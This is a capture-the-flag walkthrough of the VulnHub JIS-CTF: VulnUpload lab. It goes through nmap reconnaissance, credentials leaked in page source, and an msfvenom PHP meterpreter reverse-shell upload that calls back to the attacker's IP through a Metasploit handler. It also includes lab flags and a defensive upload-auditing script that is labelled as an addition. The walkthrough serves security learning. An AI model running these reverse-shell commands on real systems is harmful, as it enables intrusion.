JIS-CTF: VulnUpload Walkthrough

Mr. Robot (InfoSec Adventures)
Published Apr 11, 2018 · 4 min read

I have completed another challenge from vulnhub.com: JIS-CTF: VulnUpload. The description says there are 5 flags and our job is to find them. It also says the challenge takes about 1.5 hours to complete.

Let’s start

I started with an arp-scan as usual, which shows us the IP address of our target.

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts
192.168.1.115 08:00:27:94:a2:42 CADMUS COMPUTER SYSTEMS

At this point, we’re ready to move on and gather more information about the target, such as which ports are open. Here comes the good old nmap scan:

root@kali:~# nmap -A 192.168.1.115
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-11 09:32 EDT
Nmap scan report for 192.168.1.115
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
| 256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_ 256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:94:A2:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, nmap lists the disallowed entries from the robots.txt file. I immediately went for the low-hanging fruit in the /flag directory.

The 1st flag is : {8734509128730458630012095}

Next, I tried the /r00t and /admin directories as well as /uploads, but they were dead ends. In /admin_area, I inspected the page source and found the following:

<html><head>
<title>
Fake admin area :)
</title>
</head><body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
-->
</body></html>

The 2nd flag is : {7412574125871236547895214}

I had the required credentials and successfully logged in as admin. There was nothing interesting, except for the vulnerable file upload. I created a reverse shell with msfvenom:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.118 lport=9696 R > exploit.php

Then, I uploaded the file and went to set up the handler:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 192.168.1.118
lhost => 192.168.1.118
msf exploit(multi/handler) > set lport 9696
lport => 9696
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

At that point the handler was running and ready to accept incoming connections. All I had to do was execute the uploaded file on the server, so I navigated to “http://192.168.1.115/uploaded_files/exploit.php” and got a shell.

[*] Started reverse TCP handler on 192.168.1.118:9696 
[*] Sending stage (37775 bytes) to 192.168.1.115
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.118:9696 -> 192.168.1.115:36790) at 2018-04-11 11:00:27 -0400
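The upload and the request to /uploaded_files/exploit.php above come down to one weakness: the application stored a PHP file under the web root, where Apache would execute it. As an added example that is not part of the original post, here is a Python check a defender can run over an upload directory to flag files that could run as server-side code; the sample directory, its file names and the extension list are constructed for the demonstration.

```python
import os
import re
import tempfile

# PHP-family extensions that typical Apache/PHP setups execute (assumed list)
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
# PHP open tag, matched in file content regardless of the file's extension
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def audit_upload_dir(path):
    """Return a sorted list of (filename, reason) for files that could run as code.

    Check 1: any extension in the name is PHP-family (catches shell.php and
    double-extension names such as shell.php.jpg).
    Check 2: the content carries a PHP open tag (catches renamed shells).
    """
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        exts = {"." + part.lower() for part in name.split(".")[1:]}
        if exts & EXECUTABLE_EXTS:
            findings.append((name, "executable extension"))
            continue
        with open(full, "rb") as fh:
            head = fh.read(4096)  # open tag normally sits at the top of the file
        if PHP_OPEN_TAG.search(head):
            findings.append((name, "php open tag in content"))
    return findings


def build_sample_dir():
    """Constructed sample directory mirroring the /uploaded_files path in the walkthrough."""
    d = tempfile.mkdtemp(prefix="uploaded_files_")
    samples = {
        "exploit.php": b"<?php /* constructed placeholder, not a payload */ echo 1; ?>",
        "photo.jpg": b"\xff\xd8\xff\xe0JFIF",          # genuine image header
        "avatar.php.jpg": b"\xff\xd8\xff\xe0JFIF",     # double extension
        "notes.txt": b"<?php echo 'renamed'; ?>",      # script hidden behind .txt
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d


if __name__ == "__main__":
    for name, reason in audit_upload_dir(build_sample_dir()):
        print(f"{name}: {reason}")
```

The same two checks belong in the upload handler itself, together with storing uploads outside the web root; running them after the fact only tells you what already slipped through.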

I started to play around and explore the directories. In the /var/www/html directory, I found a file called “hint.txt”.

meterpreter > cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}

The 3rd flag is : {7645110034526579012345670}

I had to find the password for technawi, which turned out to be harder than any other task in the challenge. I got frustrated because I could not find the hidden file mentioned in the hint. Actually, the hint was a little misleading, because the file we are looking for was not hidden at all. I searched for files named user, pass and the like, but none of them turned up anything useful. Finally, I tried “find / -name cred*”, which revealed the /etc/mysql/conf.d/credentials.txt file.

cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor

The 4th flag is : {7845658974123568974185412}

I made use of the open SSH port and logged in as “technawi”. Now I could print out the flag.txt file in the /var/www/html directory.

technawi@Jordaninfosec-CTF01:~$ cd /var/www/html
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
The 5th flag is : {5473215946785213456975249}
Good job :)You find 5 flags and got their points and finish the first scenario....

The 5th flag is : {5473215946785213456975249}

Closing thoughts

If you are new to penetration testing or CTF games, don’t be discouraged if you get stuck or don’t know what to do next. Keep playing these games and you’ll certainly improve your skills. Happy hacking!
